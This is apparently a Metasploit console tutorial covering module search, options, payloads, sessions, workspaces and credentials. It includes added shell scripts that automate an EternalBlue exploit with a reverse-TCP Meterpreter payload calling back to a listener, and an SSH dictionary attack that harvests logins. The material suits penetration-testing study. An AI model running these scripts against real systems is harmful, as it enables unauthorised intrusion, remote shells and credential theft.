METASPLOIT - Base Commands
Starting Metasploit Console
To start the Metasploit Framework console, use the following command:
msfconsole
This launches the interactive console from which modules are selected, configured and run. Add `-q` to skip the startup banner, and confirm the database is connected with `db_status` once inside: workspaces, `creds` and the host/service tables all depend on it.
Search for Exploits
To search for a module by keyword:
search <search_term>
For example, to search for modules related to SMB on Windows:
search smb windows
Several terms are ANDed, so this lists modules of every type (exploit, auxiliary, post, payload) whose name or description matches both words, together with their rank, disclosure date and whether they implement `check`. Each result is numbered and can be selected directly with `use <number>`.
Show Available Modules
To list modules of one type, pass the type to `show`:
show exploits
show auxiliary
show post
show payloads
show all
`show` accepts all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info and options. `show all` prints thousands of lines on a full install, so `search` is usually the quicker way to find a module.
Use an Exploit Module
To use an exploit module:
use <module_path>
For example, to use an SMB exploit:
use exploit/windows/smb/ms17_010_eternalblue
This loads the module as the current context (the prompt changes to show it); `set`, `show options`, `check` and `exploit` now refer to it. `back` unloads it and returns to the top-level prompt.
Show Module Options
To view the options available for a specific module:
show options
This displays required and optional parameters for the current module.
Set Module Options
To set the required parameters for an exploit, such as the target address:
set RHOSTS <target_ip>
Replace `<target_ip>` with the target's IP address, hostname, CIDR range, or `file:<path>` to read targets from a file. Current modules use RHOSTS (plural) even for a single target; option names are case-insensitive. Other options are set the same way, and `setg` sets an option globally so it persists when you switch modules.
Show Payloads
To list all available payloads for a specific exploit:
show payloads
This will show the payloads compatible with the currently selected exploit.
Select and Set Payload
To select and configure a payload:
set PAYLOAD <payload_name>
For example, to set a reverse TCP Meterpreter payload:
set PAYLOAD windows/meterpreter/reverse_tcp
The payload must match the target's architecture: ms17_010_eternalblue only targets 64-bit hosts, so it needs windows/x64/meterpreter/reverse_tcp (its default). You then set the payload's own options, such as LHOST (the address the target connects back to, which must be reachable from the target) and LPORT:
set LHOST <local_ip>
- Example:
set LHOST 192.168.1.100
Running the Exploit
Once the module and payload are set, you can run the exploit:
exploit
This runs the exploit against RHOSTS; if it succeeds, a session carrying the chosen payload is opened and you are dropped into it. `run` is an alias for `exploit`.
Running the Exploit in Background
If you want to run the exploit in the background without blocking the console:
exploit -j
The `-j` flag runs the exploit as a background job; add `-z` so that a new session is not automatically interacted with. `jobs` lists running jobs and `jobs -k <job_id>` stops one.
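The use/set/exploit steps above can be scripted as a msfconsole resource file and run with `msfconsole -r`. The following is an added example, not code from the Metasploit project or from the original page: it validates the target, listener address and port before writing the resource script, because a typo in RHOSTS or LHOST otherwise only surfaces as a failed run. The addresses, port and output path are assumptions supplied by the caller; the module path and the x64 payload are the ones the page discusses.

```shell
#!/bin/sh
# Added example, not code from the Metasploit project or the original page.
# It scripts the use/set/exploit steps as a msfconsole resource file and runs
# it non-interactively. Target, listener address/port and the output path are
# assumptions supplied by the caller.

# Succeed only if $1 is a dotted-quad IPv4 address with each octet in 0..255.
is_ipv4() {
    case "$1" in
        ""|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    IFS=.
    set -- $1            # split into octets (IFS is '.' for this expansion)
    unset IFS            # back to the default field separators
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Succeed only if $1 is a TCP port number in 1..65535.
is_port() {
    case "$1" in ""|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# gen_exploit_rc TARGET LHOST LPORT OUTFILE
# Writes the resource script, refusing bad input instead of handing it to
# msfconsole.
gen_exploit_rc() {
    target=$1 lhost=$2 lport=$3 out=$4
    is_ipv4 "$target" || { echo "invalid RHOSTS: $target" >&2; return 1; }
    is_ipv4 "$lhost"  || { echo "invalid LHOST: $lhost" >&2; return 1; }
    is_port "$lport"  || { echo "invalid LPORT: $lport" >&2; return 1; }
    # x64 payload: ms17_010_eternalblue only targets 64-bit hosts.
    # exploit -j -z: run as a background job and do not auto-interact with
    # the session, so the script returns to the prompt instead of blocking.
    cat > "$out" <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
exploit -j -z
EOF
}

# run_rc OUTFILE: start msfconsole quietly (-q, no banner) with the resource
# script (-r). The console stays open, so the job and any session it yields
# can be inspected with `jobs` and `sessions`.
run_rc() {
    command -v msfconsole >/dev/null 2>&1 || { echo "msfconsole not found" >&2; return 1; }
    msfconsole -q -r "$1"
}

# Usage (assumed addresses):
#   gen_exploit_rc 10.0.0.5 192.168.1.100 4444 eternalblue.rc && run_rc eternalblue.rc
```

The resource file contains exactly the commands you would type at the prompt, one per line, which makes it easy to review before it runs and to reuse with `sessions -l` and `jobs` afterwards.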
Show Sessions
To view active sessions after exploiting a target:
sessions
This command shows a list of all active sessions (Meterpreter or shell sessions).
Interact with a Session
To interact with a specific session:
sessions -i <session_id>
For example, to interact with session 1:
sessions -i 1
This gives you a shell or Meterpreter prompt for that session.
Background a Session
To background a session and return to the main Metasploit console:
background
This command puts the current session in the background, allowing you to continue working on other tasks in the console.
Session Cleanup
To terminate a specific session:
sessions -k <session_id>
For example:
sessions -k 1
This closes session 1 and ends the payload process on the target. `sessions -K` terminates every open session.
Exploit Vulnerability Verification
To test whether the target appears vulnerable without launching the exploit, use:
check
This runs the module's check routine, which probes the service (for example by fingerprinting the version or sending a harmless trigger) and reports whether the target looks vulnerable. Not every module implements one; those that do not print "This module does not support check."
List Credentials
To list the credentials stored in the current workspace:
creds
This shows the username/password pairs and hashes that login scanners (such as ssh_login) and post-exploitation modules (such as hashdump) have saved to the database, plus anything added manually with `creds add`. It requires a connected database (`db_status`); `creds -h` shows filters by host, service and type.
Save Your Settings
To save the current datastore (options set with `setg` and the options of the active module):
save
This writes them to ~/.msf4/config, from where they are reloaded the next time msfconsole starts. Sessions are not saved: a live session cannot survive a console restart.
Export and Import Workspace Data
Workspaces live in the Metasploit database, not in a file. To move hosts, services, vulnerabilities and credentials between installs, export the current workspace and import the file elsewhere:
db_export -f xml <output_file>
db_import <input_file>
`db_import` also reads Nmap XML and the output of several other scanners. Module settings are not part of the export (use the `save` command above for those), and sessions cannot be exported.
Managing Workspaces
Workspaces keep the database records (hosts, services, loot, credentials) of one engagement separate from another. To list all workspaces, with the current one marked by an asterisk:
workspace
To create a new workspace and switch to it:
workspace -a <workspace_name>
To switch between workspaces:
workspace <workspace_name>
- Example:
workspace my_new_workspace
To delete a workspace together with all of its data:
workspace -d <workspace_name>
Running Auxiliary Modules
To use an auxiliary module (e.g., a scanner):
use auxiliary/scanner/portscan/tcp
You then set its options (RHOSTS, PORTS and THREADS for this scanner) with `set` and start it with `run` (`exploit` works as well). Scanner modules accept a range in RHOSTS and work through the hosts in parallel, THREADS at a time.
Start a Post-Exploitation Module
Once you have a session, you can run post-exploitation modules against it. For example, to collect information about logged-on users on a Windows target:
use post/windows/gather/enum_logged_on_users
set SESSION <session_id>
run
Post modules take the session they act on as the SESSION option; `sessions` lists the IDs. From inside a Meterpreter session, `run post/windows/gather/enum_logged_on_users` does the same without backgrounding first.
Show Help for Commands
To get help for a console command, use:
help <command>
For example, to get help on the `sessions` command:
help sessions
This displays the command's usage and options (`sessions -h` does the same). For the current module, `info` prints its description, targets, options, rank and references.
Advanced Search for Exploits
You can use keyword filters to narrow a search by module type, platform or name:
search type:exploit platform:windows name:ms17_010
This lists only exploit modules for Windows whose name contains ms17_010. Other useful keywords are cve:, edb:, author: and rank:.
Show Missing Options
To see which required options of the current module are still unset before running it:
show missing
This lists only the required options that have no value yet, whereas `show options` prints all of them. Run it before `exploit` so that a missing RHOSTS or LHOST is caught before the module starts.
Perform a Dictionary Attack
To run a dictionary attack against an SSH service, for example:
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <target_ip>
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
set STOP_ON_SUCCESS true
run
This tries every username/password combination from the two lists against the target's SSH service; STOP_ON_SUCCESS stops testing a host once one login works. Successful logins are stored in the database (see `creds`) and each one opens a shell session. Mind account-lockout policies: the number of attempts per host is users × passwords.
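Before running a login scanner it is worth knowing how many attempts it will make, since that is what trips account lockout. The following is an added example, not code from the Metasploit project or the original page: it counts the entries in the wordlists, multiplies them by the number of hosts, refuses to write the resource script when the total exceeds a budget, and otherwise emits the ssh_login commands above. The file paths, the hosts file and the budget are assumptions supplied by the caller.

```shell
#!/bin/sh
# Added example, not code from the Metasploit project or the original page.
# It sizes the SSH dictionary attack (attempts = users x passwords x hosts)
# and only writes the resource script when that stays within a lockout
# budget. Paths, hosts and the budget are assumptions supplied by the caller.

# count_entries FILE: number of non-blank lines, i.e. how many values the
# wordlist actually contributes.
count_entries() {
    awk 'NF { n++ } END { print n + 0 }' "$1"
}

# estimate_attempts USER_FILE PASS_FILE HOST_FILE: worst-case number of
# login attempts (what ssh_login makes when no login succeeds).
estimate_attempts() {
    echo $(( $(count_entries "$1") * $(count_entries "$2") * $(count_entries "$3") ))
}

# gen_ssh_login_rc USER_FILE PASS_FILE HOST_FILE OUTFILE MAX_ATTEMPTS
gen_ssh_login_rc() {
    for f in "$1" "$2" "$3"; do
        [ -s "$f" ] || { echo "missing or empty: $f" >&2; return 1; }
    done
    total=$(estimate_attempts "$1" "$2" "$3")
    if [ "$total" -gt "$5" ]; then
        echo "refusing: $total attempts exceed the budget of $5" >&2
        return 1
    fi
    # RHOSTS file:<path> reads one target per line. STOP_ON_SUCCESS stops
    # testing a host after its first valid login; found logins are stored in
    # the database (creds) and each one opens a shell session.
    cat > "$4" <<EOF
use auxiliary/scanner/ssh/ssh_login
set RHOSTS file:$3
set USER_FILE $1
set PASS_FILE $2
set STOP_ON_SUCCESS true
set THREADS 4
run
EOF
}

# Usage (assumed files and budget):
#   gen_ssh_login_rc users.txt passwords.txt hosts.txt ssh.rc 500 && msfconsole -q -r ssh.rc
```

The budget is deliberately a caller-supplied number rather than a constant: the right value depends on the target's lockout threshold and observation window, which you establish from the engagement rules or the password policy, not from the tool.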
Display Datastore Variables
To display the options currently set, run `set` with no arguments:
set
This prints the global datastore (values set with `setg`) and, when a module is selected, that module's own datastore. `get <OPTION>` shows a single value, `unset <OPTION>` clears it, and `unsetg <OPTION>` clears a global.
Exit Metasploit Console
To exit the Metasploit console:
exit
This command will close the Metasploit Framework console and return to the command-line prompt.
